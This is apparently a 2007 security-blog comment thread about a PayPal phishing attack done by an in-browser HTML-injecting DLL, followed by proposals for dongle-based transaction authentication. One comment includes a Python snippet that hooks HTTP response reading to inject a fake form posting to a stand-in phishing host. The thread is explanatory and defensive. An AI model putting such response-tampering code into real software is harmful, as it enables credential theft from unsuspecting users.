Comments

Albireo May 29, 2007 7:58 AM

I looked at the two screenshots, and I’m a bit confused… The two URIs seem right, and if the system is really malware-free, how could they hijack the browser like this?

Clive Robinson May 29, 2007 8:07 AM

It sounds like a MITM attack with the attacker actually in your machine, which effectively gives them an extraordinary level of attack capability.

If ever a better reason were needed to use active authentication in both directions (you->bank, bank->you) and on the actual transaction, this is probably it.

However, all the authentication would need to be through a side channel or an external device (dongle) that you could type the challenges into…

-ac- May 29, 2007 8:08 AM

Will it turn out to be yet another zero day, yet another warning not to use IE, yet another warning not to visit “untrusted sites”?
Also, does this attack classify as a man-in-the-endpoint attack?

DaveShaw May 29, 2007 8:10 AM

So, once again Firefox outwits IE.

This guy sounds like he understands the risks on the net, so how did he get the dll/code injection in the first place, with him been so careful about where he browses to?

Maybe him ignored it whilst browsing “questionable content”.

DaveShaw May 29, 2007 8:12 AM

PS, the bad grammer was a mistake. But it kinda fits as this is a Phishing Thread. 🙂

Hadi Hariri May 29, 2007 8:31 AM

The irony of all this is that he uses IE and Norton! The last thing that ever came out of Norton that was good was Norton Commander.

Albatross May 29, 2007 9:03 AM

“he’s been careful to practice good PC hygiene. He runs Norton 360 and uses the latest IE version”

Wow, I’m surprised that placing the contradiction this close together didn’t throw a circuit-breaker somewhere…

bob May 29, 2007 9:07 AM

Side-channel comment: It would be a lot easier to verify the top-level issuer CA if they didn’t each have 23 different spellings. And why don’t the browsers automatically recognize the DoD CAs? Are 24,000,000 customers not enough to make it worthwhile?

Juice May 29, 2007 9:24 AM

On a side note, do anti-phishing filters use grammar checkers, or do they rely on detecting technical clues like authentication, misnamed anchors and redirects?

merkelcellcancer May 29, 2007 9:32 AM

The most important rule to remember is that PayPal and banks will never send out this type of request by email.

I submit all requests like this directly to SpamCop and review the results to see exactly where they originated. It is never PayPal, eBay, or any legitimate banking institution.

http://www.spamcop.net/

It is the social engineering factor that people are falling for.

supersnail May 29, 2007 9:49 AM

RTFA guys.

The user was not clicking on an e-mail. He was going to his normal site in the normal way — directly via the browser.

He had done all the “normal” security things you are meant to do on your PC: Windows Update, anti-virus, anti-phishing, etc.
The URL was NOT spoofed.

Yet he still gets a badly worded request for user id and password.

Most likely he has a trojan on his machine which the anti-virus failed to detect and anti-phishing failed to block.

In the Register comments you will note a couple of posters who say they have seen this attack on Firefox as well.

You will also see several totally irrelevant, kneejerk “should have used Firefox” posts.
And as for “should have used Linux”: it is not yet a viable option for most users — maybe when it comes pre-installed on Dell — but not at the moment. And anyway, it’s just delaying the problem; as soon as Apple or Ubuntu have more than 5% of the market, they will become serious targets too.

The article’s salient point is that here is an average but diligent and competent user who has followed all the standard advice and procedures regarding security, yet he still has phishing software in his browser.

Dimitris Andrakakis May 29, 2007 9:51 AM

@Bruce,

I think this classifies as the type of attack you’ve warned against so many times: the attack where malicious code lets the user handle the authentication (single- or two-factor).

nobody May 29, 2007 10:26 AM

RTFA:
“Based on our description, […] guesses those experiencing this attack have inadvertently installed an html injector. That means the victims’ browsers are, in fact, visiting the PayPal website or other intended URL, but that a dll file that attaches itself to IE is managing to read and modify the html while in transit.”

With something like DLL injection (userland hooks, such as IAT hooking), the backdoor could intercept the HTML code, which is usually sent by a function in http.sys, even before it reaches the TLS/SSL layer
(check http://www.rootkit.com or their book for more information).

This is of course also possible with Firefox or any other browser, although it needs a slightly different technique, as they have their own HTML rendering libraries.
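
To make the idea concrete, here is a minimal Python analogue (illustrative only, nothing like the actual attack code): it monkey-patches the function that returns the decrypted response body, so the page can be rewritten after TLS decryption but before anything else sees it. The fake form and the patched target are assumptions for the sketch.

```
# Illustrative analogue of an in-process "HTML injector" (not real attack code).
# A DLL injected into a browser hooks the routine that hands decrypted HTML to the
# renderer; here we fake the same effect by monkey-patching HTTPResponse.read.
import http.client

_original_read = http.client.HTTPResponse.read
FAKE_FORM = b'<form action="https://phisher.invalid/steal">...</form>'  # made up

def hooked_read(self, *args, **kwargs):
    data = _original_read(self, *args, **kwargs)
    # The page arrives here *after* TLS decryption, so the URL bar and the
    # certificate still look perfectly legitimate to the user.
    if b"</body>" in data:
        data = data.replace(b"</body>", FAKE_FORM + b"</body>")
    return data

http.client.HTTPResponse.read = hooked_read
# Every urllib/http.client request made in this process now returns silently
# modified HTML; the traffic on the wire is untouched.
```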

David Wilson May 29, 2007 10:48 AM

As someone who has repeatedly done the thankless task of hand-cleaning Windows machines for people, it’s amazing what sort of stuff can be found if you bother looking at what you’re ripping out.

My ex’s computer had several million copies of a DLL in her system32 directory that appeared to be a buggy worm stuck in some sort of loop. Neither Norton nor Spybot would detect this.

The PayPal scam mentioned in the article looks like the classic sort of thing you can do with DLL injection. I’m really glad to see that this article is being given press, as it highlights the often total inadequacies of the overpriced AV software out there. It’s also pretty heartening to see that it looks to be an end user who spotted this in the first place.

As for AV software, I install ClamAV for people and specifically remove Norton, as it is nothing but a melodramatic warmonger designed to instill fear into the user who doesn’t understand its output (“ALERT!!! IVE STOPPED A PORT PROBE!!! PORT 1321!!!”). Enable Firewall, install ClamAV, look for the lock sign, don’t ignore warnings, stick to well-known sites if you can, and have a nice day. 🙂

Todd Knarr May 29, 2007 10:52 AM

One thing this person forgot: scanning hygiene. He’s using software to scan for malware, but he’s doing it on the running system. First rule: if a system is infected, you cannot trust that system or anything running on it. That includes the scanning software. The fact that Norton and the rest give a clean bill of health just means the malware’s gotten its hooks into them too, or into the system at such a low level that it’s able to hide itself from them. Old hat: stealth viruses were doing that on DOS 20 years ago, and Windows offers lots more ways to do the necessary things these days.

There’s only one way to run software to scan your system for malware: while booted from separate media that has been kept physically read-only whenever it’s been exposed to your normal system, and which is completely self-contained and treats your system only as a source of data to scan.

Lars May 29, 2007 11:14 AM

Supersnail said:

“The user was not clicking on an e-mail. He was going to his normal site in the normal way — directly via the browser.”

Actually, there’s nothing in TFA that says anything about how he got to the pages at all. For all we know, he did click on a link in an e-mail, or opened the page through some other means…

Considering the fact that the guy appears to understand that phishing happens, I’m surprised that he still uses IE to visit the most phished website around.

Clive Robinson May 29, 2007 11:25 AM

@ALL

Why are you trying to put a band aid on the symptoms of a broken bone?

There will always be another DLL injection or other attack that is going to get past malware filters. At its simplest it’s a zero-day issue: there will always be a window of opportunity for the bad guys before even the best filter writer knows the problem exists; then they have to make a filter and ship it to the customer, who then has to install it, all of which further opens the window of opportunity.

The real issue is the “broken bone” of the financial organisations, in that they all appear to lack a sensible two-way authentication and transaction authentication system. Sadly they should all know better, but as long as it costs less to ignore the issue, they will.

Back in 2000 I discussed how to prevent this general class of attack where a malicious person has control of your PC.

The answer is that the only way is out of channel authentication of both entities and the required parts of the transaction.

Nothing else will work and we will be discussing some new malware attack this time next year and the year after….

Dry May 29, 2007 12:20 PM

I wonder how successful these attempts would be if they spent as much time getting the grammar right as they do the code, heh

MSB May 29, 2007 12:57 PM

@Clive Robinson

“The answer is that the only way is out of channel authentication of both entities and the required parts of the transaction.”

Two-way authentication is not by itself a solution to the problem. When using authentication, one has to be very careful about exactly what is authenticated, and what is not. It is not sufficient for both the bank and the customer to know that they are communicating with each other.

If the user has to rely on the user interface provided by a vulnerable host, a man-in-the-middle attack can target the path between a piece of software executing in memory and the physical user interface. It is not enough to use a secure external authenticator to bootstrap a “secure” session if plaintext data is handled by a vulnerable host.

dragonfrog May 29, 2007 1:13 PM

@ Clive Robinson

I believe it would be possible to do without out-of-channel communication between entities – or at least, with only a single out-of-channel communication, when the user first sets up internet banking.

The idea would be that the user has a smart-card-like device, e.g. a USB dongle, which is able to do the following (a rough sketch in code follows this list):
– take from the untrusted PC a description of a proposed transaction, signed with the bank’s private key
– verify the signature against its internally stored copy of the bank’s public key
– display on its own screen (not the untrusted PC’s screen) the description of the transaction
– receive a keypress from the user (using buttons on the device, not the keyboard) – “yes, I approve the transaction”, or “no, I reject the transaction”
– countersign the description of the transaction with the user’s private key, which is stored only on the device itself
– return the countersigned description to the PC.
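
Something like this rough sketch, assuming Ed25519 signatures and the third-party Python “cryptography” package; the message format and key handling are purely illustrative, not any bank’s actual protocol:

```
# Rough sketch of the dongle's role: verify the bank's signature, show the
# transaction on the device's own screen, wait for a button press, countersign.
# Assumes Ed25519 and the "cryptography" package; formats are made up.
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

bank_key = Ed25519PrivateKey.generate()   # held by the bank
user_key = Ed25519PrivateKey.generate()   # stored only inside the dongle
bank_pub = bank_key.public_key()          # burned into the dongle at issue time

def dongle_approve(txn: bytes, bank_sig: bytes, user_pressed_yes: bool) -> bytes:
    """Runs inside the dongle, never on the untrusted PC."""
    bank_pub.verify(bank_sig, txn)          # raises InvalidSignature if forged
    print("DONGLE DISPLAY:", txn.decode())  # the device's own screen, not the PC's
    if not user_pressed_yes:                # physical button on the device
        raise RuntimeError("transaction rejected by user")
    return user_key.sign(txn)               # countersignature handed back to the PC

# The untrusted PC merely ferries bytes back and forth:
txn = b"pay 100.00 GBP to account 12-34-56 99999999"
countersig = dongle_approve(txn, bank_key.sign(txn), user_pressed_yes=True)
user_key.public_key().verify(countersig, txn)   # the bank's final check
```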

The user-interface mechanics of moving the signed transaction descriptions from the bank’s website, to the device, and back, are a nightmare left to the reader.

This just moves the problem of trusting a user-maintained device from one device to another – but at least it’s a single-purpose, auditable piece of hardware, and not a general-purpose $1500 porn machine.

What some banks are apparently doing is now issuing one-time password tokens to users – which of course doesn’t validate intention at all, just that the user had some sort of intention or they wouldn’t have typed the one-time password…

nedu May 29, 2007 1:13 PM

“[A]uthentication […] through a side channel or external device (dongle) that you could type the challenges into.”

@Clive Robinson,

Sitting next to me, I have an HP48 calculator. It’s capable of communicating over both wireless (infrared) and wired (RS-232) links. It has persistent storage which, among other things, stores an event log. It’s powerful enough to handle common symmetric and asymmetric cipher algorithms. And it goes without saying that it has a keypad and LCD screen.

In short, my HP48 meets many of the requirements for a portable secure terminal.

But, not only is it just a little bit too large and bulky for the average person to carry in their wallet, it has a number of other features that make it unsuitable for use as a special purpose security device. Chiefly, it interprets a general purpose language, and it’s capable of displaying user-generated forms.

In contrast to my HP48, many people carry around one of those teensy credit-card sized calculators. A device in that credit-card sized form factor would be about right for a special-purpose security keypad: A one-line LCD display and 16 keys.

Chris May 29, 2007 1:33 PM

Although not as secure as a dongle with a keypad for remote authentication, you could likely derive some benefit from something like the code wheels used by computer games in the mid-eighties. The bank would produce a challenge — or some details of the transaction would be the challenge — and the end user has a code wheel to produce a response.

This is cardboard and plastic (“cheap!”), even when you are issuing unique tokens to each person.

This failed as a technique for protecting computer games because the holders of the physical token were the ones who wanted to break the security – their economic incentives were not aligned. It can work for transactions because the economic interests of the bank and the user are aligned — they both want to protect the account.

X the Unknown May 29, 2007 1:34 PM

@dragonfrog: “…the user has a smart-card like device…”

This IS, however, an out-of-channel communication. The bank has just proxied part of its authentication over to a (supposedly secure) device that uses an algorithm-and-key supplied by the bank to handle part of the transaction.

That being said, it’s still a nicer solution than requiring a phone-call/text-message/etc. through a communications channel known to be distinct from the ‘Net connection.

nedu May 29, 2007 1:37 PM

“It is not enough to use an secure external authenticator to bootstrap a ‘secure’ session if plaintext data is handled by a vulnerable host.”

@MSB

The biggest, obvious problem in banking and payment systems today is the ubiquitous overloading of a semi-public account identifier as an authentication token.

Your bank or credit card account identifier has to be shared with too many parties to consider it any kind of secret. When you can obtain money from someone just by knowing their account number, well, that’s just wrong.

In a shared-secret architecture, disclosure of the secret must be on a limited, need-to-know basis.

MSB May 29, 2007 1:56 PM

@nedu

“The biggest, obvious problem in banking and payment systems today is the ubiquitous overloading of a semi-public account identifier as an authentication token.”

The mixing of the roles of account identifier and reusable secret credential is certainly a problem in general, but that’s not the focus of the article. The vulnerability in the article is still a problem even if the information being stolen is not some kind of reusable credential.

TooManyCAs May 29, 2007 2:07 PM

@bob
“Side-channel comment: It would be a lot easier to verify the top-level issuer CA if they didn’t each have 23 different spellings.”

It would be even easier if there were only a few top level issuer CAs with trusted root certs in the browser (or OS). At last count, there were over 100 CAs that have trusted root certificates in the IE browser. I haven’t checked, but I suspect Firefox has just as many.
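
For the curious, here is a quick way to count the roots in the trust store your local OS/OpenSSL exposes to Python (a rough sketch; this store may not exactly match the browser’s bundled list):

```
# Count the CA roots in the default trust store Python/OpenSSL sees on this machine.
# Note: this is the OS/OpenSSL store, which may differ from the browser's own list,
# and directory-based (capath) stores only expose certificates after first use.
import ssl

ctx = ssl.create_default_context()   # loads the platform's default CA certificates
roots = ctx.get_ca_certs()
print(f"{len(roots)} trusted root certificates in the default store")
```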

LUAandUAC May 29, 2007 2:15 PM

If this person is as diligent as this article implies, I would be curious to know how this “HTML injection DLL” could have gotten installed on their computer.

Certainly, this person isn’t logging into a user account which has administrator privileges… right?

nedu May 29, 2007 2:17 PM

@MSB

The spoofed form asks for:
Name, DOB, SSN, Mother’s Maiden Name, Card No., Card Expiration, Card CVV2, ATM PIN, Checking Acct. No., Routing No.

With the sole exception of “ATM PIN”, none of these identifiers should be sufficient to obtain money from the user.

We could teach users to never, ever, ever enter their authenticating PIN into any device other than their own, personal bank-issued keypad.

MSB May 29, 2007 2:27 PM

@TooManyCAs

“It would be even easier if there were only a few top level issuer CAs with trusted root certs in the browser (or OS). At last count, there were over 100 CAs that have trusted root certificates in the IE browser.”

Having numerous top-level CAs is but one problem; another is that the initial set of trusted CAs is configured by the browser developer, not the user. I suspect that most users never check, much less change, the set of CAs trusted by the browsers they use. They haven’t even heard of some of the entities they “trust”.

MSB May 29, 2007 2:37 PM

@nedu

‘The spoofed form asks for:
Name, DOB, SSN, Mother’s Maiden Name, Card No., Card Expiration, Card CVV2, ATM PIN, Checking Acct. No., Routing No.

With the sole exception of “ATM PIN”, none of these identifiers should be sufficient to obtain money from the user.’

That depends on the individual institution. The pieces of info you listed may be enough to get a password reset from some banks.

nedu May 29, 2007 2:49 PM

“The pieces of info you listed may be enough to get a password reset from some bank.”

@MSB,

When I wrote “should”, that was normative, not descriptive. In other words, the way things should be, not necessarily how they are.

If a user shows up in person with their security device and says something like, “My credit card is broken”, then additional identifiers/authenticators should be sufficient to get the bank to reset the user’s password.

But in general, for payment transactions, a bank that pays out remotely to any Joe with a few pieces of information should be risking its own money and credit.

Meanwhile, mere possession of a security device shouldn’t permit someone to brute-force a short PIN without raising an alarm at the bank.

Jay May 29, 2007 3:12 PM

I think it’s pretty straightforward not to be fooled by these, as all these sites (PayPal, HSBC) say at the introduction to their online banking that no personal details will be asked for in full, online or by phone; you are only supposed to type parts of them when requested. So people should be vigilant about it. That will prevent these kinds of fraudulent tactics.

Clive Robinson May 29, 2007 3:16 PM

@MSB, All

“Two-way authentication is not by itself a solution to the problem. When using authentication, one has to be very careful about exactly what is authenticated, and what is not. It is not sufficient for both the bank and the customer to know that they are communicating with each other.”

Yes, I agree 100% with that, which is why I said,

“authentication of both entities and the required parts of the transaction.”

Initially, both parties have to establish that they have some form of (untrusted) communications link; otherwise the parties should cease trying to communicate.

When they have established that they at least have some form of “untrusted” communications path, they then need to transfer data to one another in a way that both parties can be assured is valid. This is the authentication of the “required parts of the transaction”.

Now there are very many ways to do this, but let’s assume a very simple system to convey the idea (then shoot holes in it as you wish 😉

1. The customer selects an account-to-account transfer.

2. The bank sends a form with an “only human readable” number which is unique to the user’s dongle and in time (all validation codes sent by the bank will be human-readable only).

3. The user types this number into the dongle, which shows an appropriate go/no-go indication. The number could also be used to set the dongle into a given mode, here the account-to-account transfer mode.

4. The user types the “to” account number into the dongle, which displays an encrypted code that the user then types into the appropriate space on the form.

5. The same with the amount and any other field that requires verification.

6. The user then submits the form back to the bank.

7. The bank sends back a verification code that the user types into the dongle, which indicates whether the code is correct for the data entered, and then gives the user a final authorisation code for the whole transaction.

8. The user types this in and sends it off to the bank, which sends a final closing code that the user types in to check that the transaction has been authenticated.

If the codes are unique to the dongle being used and in time, then the attacker has a bit of a problem, in that they do not see the transaction details in plain text, nor can they predict what the authentication codes are going to be, either from the user or from the bank.

I am also assuming that the codes will contain a degree of error protection to prevent typos confusing things, etc.
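
As a rough sketch of how steps 4 and 5 might derive those per-field codes, assume the dongle shares a per-device secret with the bank and the codes are short truncated HMACs over the field value and a time window (an illustration of the idea, not a vetted design; a real code would also carry a check digit for the error protection mentioned above):

```
# Rough sketch of a per-field verification code: a truncated HMAC over a per-dongle
# secret, the field name/value and a coarse time window. Illustrative only.
import hmac, hashlib, time

DONGLE_SECRET = b"per-device key shared with the bank"  # provisioned at issue time
WINDOW = 300                                            # codes change every ~5 minutes

def field_code(field_name, field_value, now=None):
    t = int((now if now is not None else time.time()) // WINDOW)
    msg = f"{field_name}|{field_value}|{t}".encode()
    mac = hmac.new(DONGLE_SECRET, msg, hashlib.sha256).digest()
    return f"{int.from_bytes(mac[:4], 'big') % 10**8:08d}"  # 8 digits fit a keypad

# Dongle side: the user keys in the destination account and reads the code back to
# type into the web form; the bank recomputes it with the same key and compares.
print(field_code("to_account", "12-34-56 99999999"))
print(field_code("amount", "100.00"))
```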

Oh, and the “only human readable” stuff from the bank reduces to near zero the ability of software to read and understand the data; therefore the attacker also has to be human, and present for the transaction.

The use of these two technologies hopefully reduces the chance of a successful phish down to the security of the dongle, or better.

I appreciate that the system is overly complex, but can it be made simpler and still protect the transaction properly?

As I said, it’s a simple idea to show that it is possible for the transaction to happen even over an untrusted channel, with not only both sides proving who they are, but also the required details of the transaction itself.

Please feel free not only to shoot holes in it but also to come up with other ideas. Hopefully it might start an “open” approach to making all financial transactions more secure, which would benefit not only us customers but the banks as well…

Evan Murphy May 29, 2007 3:19 PM

@LUAandUAC,

I don’t know that many details about Windows, but in this case, it doesn’t matter how restricted the user account is. The problem is that the web browser is running in the same security context as the rest of the user’s programs. The web browser executable stored on disk can’t be tampered with, but when a restricted user account starts it, that image is mapped or copied into that user’s memory. Anything that a running executable image does internally—or more importantly, anything you want to do to it from outside—is legit, because you’re modifying your own in-memory instance of the running image and its environment.

All common operating systems share these features: allowing a user to do things like dynamically load shared objects and attach debuggers. In Linux, take a look at the havoc you can wreak with LD_PRELOAD shims, for example. As long as you have this ability (and it’s pretty fundamental), attackers can tamper with your programs while they’re running, regardless of the security context you’re in.

Joe May 30, 2007 1:50 PM

Couldn’t this be that attack where a user visits a web page which downloads code that is then installed on their router?

wm May 31, 2007 6:42 AM

@Clive Robinson (secure banking protocol)

I think it can be made simpler.

How about this (a minimal sketch in code follows the list):
(1) The user enters the transaction they want to perform into their bank-supplied smartcard (source and destination account numbers, amount, etc.).
(2) The smartcard adds a unique serial number (e.g. a counter stored internally in the card; it doesn’t have to be unguessable) to prevent replay attacks.
(3) The smartcard digitally signs the transaction+counter using a key that is unique to your account and known to the bank.
(4) You send the transaction+counter+signature to the bank over the (untrusted) connection. Optionally, you could encrypt the message for confidentiality, but I don’t think that’s required for security against fraud.
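
A minimal sketch of steps (2)-(4), assuming the card and the bank share a symmetric key and the “signature” is an HMAC; the names and message format are illustrative:

```
# Minimal sketch of the scheme: HMAC-"sign" the transaction plus a monotonically
# increasing counter; the bank rejects any counter it has already seen. Illustrative.
import hmac, hashlib

CARD_KEY = b"symmetric key shared by this card and the bank"

class SmartCard:
    def __init__(self):
        self.counter = 0                          # stored inside the card

    def sign_transaction(self, txn: str) -> tuple[str, int, str]:
        self.counter += 1
        msg = f"{txn}|{self.counter}".encode()
        sig = hmac.new(CARD_KEY, msg, hashlib.sha256).hexdigest()
        return txn, self.counter, sig

class Bank:
    def __init__(self):
        self.last_counter = 0

    def accept(self, txn: str, counter: int, sig: str) -> bool:
        msg = f"{txn}|{counter}".encode()
        good = hmac.compare_digest(sig, hmac.new(CARD_KEY, msg, hashlib.sha256).hexdigest())
        fresh = counter > self.last_counter       # replayed messages are stale
        if good and fresh:
            self.last_counter = counter
        return good and fresh

card, bank = SmartCard(), Bank()
msg = card.sign_transaction("pay 100.00 to 12-34-56 99999999")
assert bank.accept(*msg)       # first submission goes through
assert not bank.accept(*msg)   # the same message replayed is rejected
```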

Or have I overlooked something?

I’m assuming that the card can be trusted, of course, and that you know the genuine account number that you want to send money to.

(Actually, you probably don’t know the account number if you’re buying something from a web site you’ve not used before — this is still vulnerable to a MITM attack — but there’s nothing you can do to verify the authenticity of a communication from someone with whom you share no secrets at all.)

wm May 31, 2007 6:50 AM

@Clive Robinson and myself:

Under the protocol I described above, you don’t actually know if the web site you’re talking to is the bank, and they don’t know if the person they’re talking to is you. However, this doesn’t matter, because:

The bank doesn’t need to know who is sending them the message; all that matters is whether the transaction was approved by you (which can be determined from the signature).

You don’t need to know that you’re talking to the bank, because nobody receiving your message can do anything with it except use it to carry out the transaction you wanted done anyway. (They would have to break the digital signature mechanism to change it to a different transaction, and they can’t re-use the message repeatedly to perform the same transaction over and over again because the message has a unique serial number.) An attacker could pretend to be the bank, accept your message, and then discard it for a denial-of-service attack, but that’s about it (and there are easier ways to mount a DoS).

nedu May 31, 2007 10:40 PM

@wm

I’m not sure if you’ve overlooked something, or just skimmed over it: for two-factor authentication, the bank needs to verify that the operator who possesses the card also knows a shared secret. Otherwise the card (even if protected by a local password) isn’t resistant to brute-force attacks by an unauthorized person.

One way to do this would be for the bank to send the card an unguessable nonce for each transaction. Then the card calculates a one-way hash from a concatenation of the nonce and a value derived from the user’s password(*). The hash is returned to the bank as part of the transaction record signed by the card.

(*) A value derived from the user’s password: the bank need not store the user’s card password. In fact, it probably shouldn’t. But the bank may need to know a salted hash of the user’s password. So the card might take the salt and calculate a first hash of the password to obtain the shared secret, then calculate the second hash from the shared secret and the nonce.
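
A quick sketch of that double-hash construction (a real design would use HMAC and a slow KDF, but this follows the footnote: the raw password never leaves the card, and the bank stores only the salted first hash; all names and sizes are illustrative):

```
# Sketch of the footnote's construction: the bank stores only the salt and the first
# hash; the card proves knowledge of the password by hashing that value with a nonce.
import hashlib, os

def first_hash(salt: bytes, password: str) -> bytes:
    return hashlib.sha256(salt + password.encode()).digest()   # the "shared secret"

def response(shared_secret: bytes, nonce: bytes) -> bytes:
    return hashlib.sha256(shared_secret + nonce).digest()      # returned, signed by card

# Enrolment: bank keeps (salt, shared_secret); the raw password stays on the card.
salt = os.urandom(16)
bank_record = first_hash(salt, "correct horse battery staple")

# Per transaction: bank sends an unguessable nonce, card answers with the second hash.
nonce = os.urandom(16)
card_answer = response(first_hash(salt, "correct horse battery staple"), nonce)
assert card_answer == response(bank_record, nonce)             # bank's verification
```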

wm June 1, 2007 2:54 AM

@nedu (the need to protect against brute-force attacks on the smartcard)

Good point.

I guess I was assuming that the smartcard would be protected against unauthorised access, probably by having a password with a limited number of wrong tries before the card locks up and won’t work at all any more (and you’d need to get a new one from the bank). If you allow, say, 10 wrong guesses that should stop brute-force attacks while not locking out the genuine owner very often.

You have to be a bit careful, because if you just reset the wrong-tries count to zero when you get a successful login, that allows someone with regular access to the card (like your room-mate) to brute-force it half-a-dozen tries at a time between your legitimate logins. This could possibly be defended against by the card displaying at the login prompt the number of failed logins — the legitimate owner would expect this to be zero almost all the time (except just after getting a login wrong, of course).
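
A toy version of that policy, with the limit of 10 taken from the comment and everything else illustrative: the failed-attempt count is shown at every login and only reset after the owner has had a chance to see it.

```
# Toy lockout policy: 10 wrong tries locks the card for good, and the failed-attempt
# count is shown at every login rather than being silently reset. Illustrative only.
class CardLogin:
    MAX_WRONG = 10

    def __init__(self, pin: str):
        self._pin = pin
        self.failed = 0
        self.locked = False

    def login(self, attempt: str) -> bool:
        if self.locked:
            raise RuntimeError("card permanently locked; get a new one from the bank")
        print(f"failed attempts since last successful login: {self.failed}")
        if attempt == self._pin:
            self.failed = 0            # reset only *after* showing the count to the owner
            return True
        self.failed += 1
        if self.failed >= self.MAX_WRONG:
            self.locked = True
        return False

card = CardLogin("4921")
card.login("0000")     # prints 0, then fails
card.login("4921")     # prints 1 -- the owner can notice someone has been guessing
```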

clive robinson June 1, 2007 4:26 AM

@wm

There is a problem with digital signatures, which is size versus security.

Take a (believed to be insecure) 1024-bit RSA signature and divide by 4: that gives the user 256 key presses on a hex keypad, which has a certain degree of ouch factor, as well as other problems.

I was thinking about using a time-dependent stream cipher with built-in safeguards to stop various attacks like bit-flipping, etc.

wm June 1, 2007 9:00 AM

@clive robinson (on the amount of typing required)

That certainly needs to be a consideration, but I don’t think public-key signatures are required for this application, are they? It’s not as if anyone in the world needs to be able to verify the authenticity of a message; just the bank.

That being the case, and assuming that the bank has other measures to prevent insiders getting hold of the signing key for your account, a 128-bit symmetric-key signature could be used.

And since the signature only needs to be typed into an ordinary PC (not into the smartcard), you can use a full alphanumeric keyboard. Even with a case-insensitive coding, that easily gives you 5 bits per character, reducing the typing to 26 characters (plus the transaction details themselves).
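
The arithmetic works out exactly: base32 encodes 5 bits per character, so a 128-bit truncated MAC comes to 26 typed characters (an illustrative encoding; any case-insensitive alphabet of 32 symbols would do, and the key and transaction strings below are made up):

```
# A 128-bit symmetric "signature" rendered as a case-insensitive string: base32 gives
# 5 bits per character, so 128 bits -> ceil(128/5) = 26 characters to type.
import base64, hashlib, hmac, math

key = b"per-account signing key held by the bank and the card"
txn = b"pay 100.00 to 12-34-56 99999999, counter 17"

mac = hmac.new(key, txn, hashlib.sha256).digest()[:16]   # truncate to 128 bits
code = base64.b32encode(mac).decode().rstrip("=")        # drop the padding
print(len(code), code)                                   # 26 characters
assert len(code) == math.ceil(128 / 5) == 26
```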

That’s around the same amount as people have routinely been required to enter to validate a software licence installation, for example.

nedu June 1, 2007 12:13 PM

“… someone with regular access to the card (like your room-mate)…”

@wm,

The threat model that I was considering was the case where the user loses the card and it falls into the hands of a sophisticated attacker. In that case, assume that all of the secrets present in the card can be compromised.

Further, a really sophisticated attacker might passively listen to all of your previous transactions with the bank, then after accumulating enough data, choose when to steal your card.

For the room-mate case, though, if we assume that the attacker obtains possession of the card, obtains all the card secrets, surreptitiously installs a keylogger, then returns the card with no obvious marks on the case or wires hanging out of it… well, it’s probably just game over.

So, for this discussion, we should probably first figure out what your room-mate’s capabilities are.

Pogo June 1, 2007 10:50 PM

You can only fold a piece of paper seven times, period.

Why do the writers here keep “bending themselves double” in order to justify the use of computers to perform simple banking transactions? It should be amply obvious by this time that NO internet based transaction is secure. A person might as well stand on a street corner and shout out their personal info. This problem will never be solved by wise-acreing yet another software “solution”. Just more guess-work.

In my opinion, there is a somewhat more secure method that doesn’t involve computers: Go to the bank in person and do the transaction with a live Teller. Of course, this idea is not only effective, it is too blindingly simple, especially for those whose job security it would affect.

“we have met the enemy and he is us”

Clive Robinson June 4, 2007 5:31 AM

@Pogo,

“Why do the writers here keep “bending themselves double” in order to justify the use of computers to perform simple banking transactions?”

Because in the U.K. at least, the banks want to get rid of branches and tellers as “negatively affecting shareholder value”.

So your,

“Go to the bank in person and do the transaction with a live Teller.”

is increasingly not an option in the U.K.
